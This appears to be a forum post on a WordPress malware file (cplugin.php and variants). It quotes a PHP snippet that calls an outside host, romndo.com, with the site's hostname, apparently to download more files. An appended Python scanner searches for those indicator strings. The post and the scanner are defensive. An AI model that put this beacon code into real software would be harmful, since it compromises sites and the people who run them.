There is a recent attack where numerous WordPress websites are taken down due to a file
Code:
cplugin.php
which is malware.
The malware is badly written code, so for now it is mostly causing 500 server runtime errors. But it's better to delete it immediately, as it migrates to all the websites on the server and has code to hit a malware URL to download additional files. A snippet of the malware code:
Code:
if(get_option('log_install') !=='1')
{
    if(!$log_installed = @file_get_contents("http://www.romndo.com/o2.php?host=".$_SERVER["HTTP_HOST"]))
    {
        $log_installed = @file_get_contents_cplugin("http://www.romndo.com/o2.php?host=".$_SERVER["HTTP_HOST"]);
    }
}
I have figured out a solution and am posting the answer myself to help all users out there.
Edit:
There are reports of the same file being named differently for users:
Code:
ccode.php, cplugin.php
and
Code:
helad.php
in which case the fix can be modified.
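
A defender-side check built from the indicators in this post (the three reported file names and the strings visible in the snippet), as an added example that is not part of the original post. The function names, the 2 MiB read limit and the sample tree are assumptions constructed for illustration.

```python
import os
import tempfile

# Indicators taken from the post: reported file names and strings in the snippet.
SUSPECT_NAMES = {"cplugin.php", "ccode.php", "helad.php"}
SUSPECT_STRINGS = (
    b"romndo.com/o2.php",
    b"file_get_contents_cplugin",
    b"get_option('log_install')",
)
MAX_READ = 2 * 1024 * 1024  # assumption: inspect at most 2 MiB per file

def scan_tree(root):
    """Return {path: [reasons]} for PHP files matching a name or string indicator."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            reasons = ["name:" + name.lower()] if name.lower() in SUSPECT_NAMES else []
            try:
                with open(path, "rb") as fh:
                    data = fh.read(MAX_READ)
            except OSError:
                data = b""  # unreadable file: only a name match can still be reported
            reasons += ["string:" + s.decode() for s in SUSPECT_STRINGS if s in data]
            if reasons:
                findings[path] = reasons
    return findings

def build_sample_tree(root):
    """Constructed sample: a clean plugin, a name-only match and a renamed copy."""
    plug = os.path.join(root, "wp-content", "plugins")
    os.makedirs(plug)
    samples = {
        "hello.php": b"<?php // clean plugin\n",
        "helad.php": b"<?php // empty file with a reported name\n",
        "cache.php": b"<?php // constructed: contains romndo.com/o2.php marker\n",
    }
    for name, body in samples.items():
        with open(os.path.join(plug, name), "wb") as fh:
            fh.write(body)

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        for path, reasons in sorted(scan_tree(tmp).items()):
            print(os.path.relpath(path, tmp), reasons)
```

Matching on content as well as on name catches copies saved under a file name not listed in the post; a name-only hit still needs a manual look at the file.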